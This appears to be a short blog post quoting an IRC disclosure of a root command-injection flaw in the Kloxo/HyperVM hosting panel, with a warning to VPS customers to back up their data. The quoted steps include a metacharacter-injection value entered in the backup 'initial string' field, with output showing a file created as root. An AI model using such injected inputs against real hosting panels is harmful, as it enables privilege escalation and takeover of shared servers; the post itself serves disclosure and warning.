This morning, I woke up to this.
[11:15:39] <@nenolod> #####################################################################
[11:15:39] <@nenolod> # ISSUE #11 - metachar injection, local command execution as root
[11:15:39] <@nenolod> #####################################################################
[11:15:39] <@nenolod> Local users can execute any command(s) of their choice as root via
[11:15:40] <@nenolod> metacharacter injection in the backup initial string.
[11:15:40] <@nenolod> 1. Log into Kloxo
[11:15:41] <@nenolod> 2. Click "Backup Home"
[11:15:41] <@nenolod> 3. In the box titled "Backup File Initial String", enter:
[11:15:42] <@nenolod> ; /bin/touch /tmp/i_am_root ;
[11:15:42] <@nenolod> 4. Click "Backup Now"
[11:15:43] <@nenolod> Observe:
[11:15:43] <@nenolod> [user1@testing574 user1]$ ls -l /tmp/i_am_root
[11:15:44] <@nenolod> -rw-r--r-- 1 root root 0 May 20 21:50 /tmp/i_am_root
So basically the jist of it is.
- You have a VPS that uses HyperVM (which means close to all VPS companies out there).
- Someone else on the same HyperVM installation finds out about this.
- They root the physical box.
- ???
- PROFIT! (for the hacker)
I for one have backed up all the (important) shit that I had stored on any HyperVM based VPSes, and I recommend you do the same.
The full vulnerability report is located at http://www.milw0rm.com/exploits/8880.